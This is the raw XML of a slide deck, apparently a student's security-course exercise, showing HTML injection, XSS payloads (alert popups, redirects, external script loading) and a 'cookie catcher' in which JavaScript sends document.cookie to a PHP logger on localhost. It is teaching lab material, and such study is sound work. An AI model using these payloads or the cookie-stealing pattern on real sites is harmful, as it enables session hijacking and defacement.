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618"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="148" d="100"/>
          <a:sy n="148" d="100"/>
        </p:scale>
        <p:origin x="21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8A5E9-FF72-FE06-5B3D-243CAEC8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5C4718-D188-595F-F299-3D8D3D148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E2AA65-0D41-87C4-AB63-D213CB81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E5412-9BF8-B4D3-2F89-59ED174A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A7D545-5571-D65B-84CA-6106A931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84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12706-6C4B-6E14-341B-8642155D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9D4D79C-D4DD-95FD-2630-06749BF1C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D66DA-4BF8-0E27-FFD2-47078146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E26F0-EA2A-F82E-A644-2B22BEDB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1C0E-7BB3-6EEC-4649-B7264E6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3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CE7A17-44F4-DDBA-BC82-9DBC561F1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ED7E39-97E1-41FE-1EE7-D03DFFBC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B92257-8D88-8370-BB53-16FD0423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4BBCA-7EDF-3DA1-6188-130E5683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08069-5AE7-DD8F-5AA5-E1AB6F2E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25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C7E3F-87CE-E07B-17F2-4F88E8B1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56BBCE-2564-B9E9-7906-B635D989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BA3EB-6237-FC62-8201-58942E86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4CBBF5-5C16-482B-731D-55063443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30982-759D-F75B-6D35-1A46746E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8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439F0-82CE-CFFE-E535-5C7A9A21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A0F126-0B78-297E-F706-A7EC5F88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F143EB-A951-B283-A41A-7CCE4CD7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82869-0889-6954-1B89-F3F65BF2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E314E-7DA5-4CC5-F07E-A511EF2A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4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E9CE8-3EC5-8F4D-931C-3625B12A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490EFC-039E-7891-E034-FE626DF5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E10F9-F873-7871-B75E-F668D19B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C2D72-F4A1-82C7-D4CB-1D954EC8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6B63D1-E4EE-6A67-64E3-E49AFD3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5AEDB-5F5A-A63D-67E4-86BD9624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53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61391-FA95-23F6-C767-277553C8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EC166-31D7-CC00-7583-D9890CC6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C0E03C-93CD-8075-9A62-48A5855F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CA8F77-9B9C-30CB-3952-5A4C4E83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74B7D4-B52E-EDD8-97C2-03394362A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1841A9-9E5D-EDBC-5632-F1DA1AFD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DEC6FF-87E2-40E2-7FAC-00FB3A66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A80066-8C77-20A1-8E59-EFFBB7AE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FC03C-7113-A4F9-E218-346FE21A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914315-3134-95CD-FF8F-FD65A8B8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B69BED-B3C5-4B76-B144-24837462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E74AE-FB1B-9A6D-3E9D-4D4F9F7C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7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E138C9-B63E-581A-0009-96A6CEE1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F63E3A-FF1E-9DDA-8A04-E527C38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9AEE4E-D2A4-1756-7D52-05DA9282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33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57B80-1937-8669-C248-C5FC912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5F084-8CA1-C14D-8F10-E6AEC9BC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B5B64-CDD8-4795-3A70-F4E995122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767255-016E-0EEE-0FAB-AFD5BB80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58C85F-A383-7AE2-F477-0EBE0D42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8BC48-8DAC-7400-B90D-B41B8270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93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E330F4-E332-2523-0D20-8BC652E7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AE14DC-201E-6351-7677-55C769164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5362F4-5E20-E197-F084-5A715345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8801B7-74F7-D71B-1A73-B4F85122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A30F30-FD8C-159D-2116-AE445E34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306195-19DF-86F5-4257-C8768A0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BBACF9-3114-BAEF-CAD7-1A999C73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53CBD-B56D-1E40-F93D-CFAE72B8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8C742-1C92-0969-B099-5F06C04BE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BBF57-A559-CB41-98B3-5369A4A09460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60BC92-A4CB-01D0-193C-65CB5BCB1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198872-043F-AE4C-1C98-8B686690C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465B8-8095-854B-B193-85B6649B0E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D0CF0-384C-4122-B7A4-2B560ECEF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Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> 3: Teuschl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2B0FCC-BCAB-B60D-2991-5BE51CD23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2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C0F90-CB4C-F19E-8B76-A198AEC6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de-DE" sz="3500" dirty="0" err="1"/>
              <a:t>Challange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" dirty="0"/>
              <a:t> 1: Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" dirty="0" err="1"/>
              <a:t>Defacing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" dirty="0"/>
              <a:t> / HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" dirty="0" err="1"/>
              <a:t>Injections</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="3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DD11F-C922-44A5-FB4A-BF27100F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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>background</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> a different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>color</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:effectLst/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de-AT" sz="1500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de-AT" sz="1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yellow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}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de-AT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endParaRPr lang="de-AT" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808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de-AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Display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another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image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on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website</a:t>
            </a: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cdn.expertphotography.com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wp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-content/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uploads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/2022/03/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What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-Are-Stock-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Photos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-Ale-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Bloshka.jpg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alt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"XSS Image"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"width:300px; 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height:auto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;"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r>
              <a:rPr lang="de-AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Create a link on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website</a:t>
            </a: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www.technikum-wien.at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/"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de-AT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"_blank"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Click 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me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de-AT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endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4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F0E1DDB-5225-A470-158A-8C486A07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15" y="681037"/>
            <a:ext cx="3233057" cy="1472732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6" descr="Ein Bild, das Kleidung, Text, Menschliches Gesicht, Screenshot enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F880154-0B41-3EFE-0AD3-A688D5CFB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88" y="3088411"/>
            <a:ext cx="3795398" cy="2153910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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42242E37-F4D5-2657-F6CA-FF64E05CC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4" y="4505935"/>
            <a:ext cx="5214258" cy="19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3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0897F-B65A-46B2-0622-68EFFF80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6966"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" dirty="0"/>
              <a:t>Challenge 2: JavaScript / Cross Site Scripting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A9F84-A916-2F0C-845D-A6265E1E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740"/>
            <a:ext cx="10515600" cy="5478223"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Popup: Display a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message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to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client</a:t>
            </a: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alert(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'Hello, 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an XSS Popup!'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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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r>
              <a:rPr lang="de-AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Redirect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client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to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some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other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website</a:t>
            </a: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window.location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'https://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www.technikum-wien.at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de-AT" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="343A40"/>
              </a:solidFill>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6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8C78038-D1DF-339A-759F-FE8BC80F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70" y="1962008"/>
            <a:ext cx="4552950" cy="17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1C8A-3D54-4995-357F-6159AC76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86BFB-3992-498C-0652-04B53FAB5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6966"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="3500" dirty="0"/>
              <a:t>Challenge 2: JavaScript / Cross Site Scripting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DB8A1-4CA8-0854-E4C1-2791E7DF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740"/>
            <a:ext cx="10515600" cy="54782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AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Create a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session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with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server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and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display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current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sesssion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 ID</a:t>
            </a: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alert(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document.cookie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</a:br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de-DE" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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DE" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>load</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> JS code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> a different web source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>into</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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DE" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" i="1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de-DE" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE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www.technikum-wien.at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/_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chunks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pages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/studium-017e8e814ae75b5f.js"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&gt;&lt;/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5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de-DE" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="343A40"/>
              </a:solidFill>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4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7D977DCB-944D-623F-D3A3-65EB8688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608" y="1309868"/>
            <a:ext cx="2260120" cy="1051104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Grafik 7" descr="Ein Bild, das Text, Software, Multimedia-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1F0DDCEB-68A5-FB48-01D8-8ED20DFD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33" y="3592378"/>
            <a:ext cx="5846245" cy="32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B383B-FE26-3F54-169F-9832F85D7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03510-2E1B-AC52-633D-74418C5F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6965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Challenge 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="3600" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="3600" dirty="0"/>
              <a:t> / Cookie Catcher</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="3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78EEF5-E608-9E47-14CB-085BC420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126"/>
            <a:ext cx="10515600" cy="5417838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Write a "Cookie Catcher",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Clientside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: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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>, Backend: PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Script</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="17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de-AT" sz="17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7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de-AT" sz="17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de-AT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Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1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de-AT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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="17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localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1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/SWSEC/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="17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log.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="17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de-AT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de-AT" sz="17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document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="17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de-AT" sz="17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de-AT" sz="17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de-AT" sz="170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de-AT" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="343A4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de-DE" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Log.php</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT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de-AT" sz="15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php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de-AT" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="15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Schritt 1: Cookie-Parameter auslesen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$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cookie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isset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($_GET[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cookie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 ? $_GET[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cookie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: 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‘‘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Schritt 2: Ausgeben (oder in eine Datei schreiben)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echo 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"Cookie empfangen: "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htmlentities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($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cookie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Optional: Sende (fast) leeres Bild, damit im Browser kein Fehler angezeigt wird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AT" sz="15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"Content-Type: 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de-AT" sz="15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gif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echo base64_decode(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="15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"R0lGODlhAQABAAAAACw="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="15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de-AT" sz="15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?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="15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de-DE" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="343A4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262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B5551-BAE9-E132-9B2A-0DEABEBA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200C8-53D8-368E-21CE-4064A63E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86965"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="3600" dirty="0"/>
              <a:t>Challenge 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="3600" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="3600" dirty="0"/>
              <a:t> / Cookie Catcher</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="3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37735-C35A-ABFB-4575-1F04F993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126"/>
            <a:ext cx="10515600" cy="5417838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343A40"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Ergebnis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="343A40"/>
              </a:solidFill>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Grafik 4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7A28E449-1920-A5BA-ABA5-A58F47CE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35" y="1031269"/>
            <a:ext cx="8154222" cy="40036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BE0B7C9-A713-4FC5-A29F-D7CD01C28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5690901"/>
            <a:ext cx="10994572" cy="5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Breitbild</PresentationFormat>
  <Paragraphs>33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Menlo</vt:lpstr>
      <vt:lpstr>Office</vt:lpstr>
      <vt:lpstr>Exercise 3: Teuschl</vt:lpstr>
      <vt:lpstr>Challange 1: Site Defacing / HTML Injections</vt:lpstr>
      <vt:lpstr>Challenge 2: JavaScript / Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Challenge 2: JavaScript / Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Challenge 3: Javascript / Cookie Catcher</vt:lpstr>
      <vt:lpstr>Challenge 3: Javascript / Cookie Catcher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Teuschl</dc:creator>
  <cp:lastModifiedBy>Matthias Teuschl</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2025-01-17T10:54:40Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-17T09:28:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-17T10:54:46Z</dcterms:modified>
</cp:coreProperties>
</file>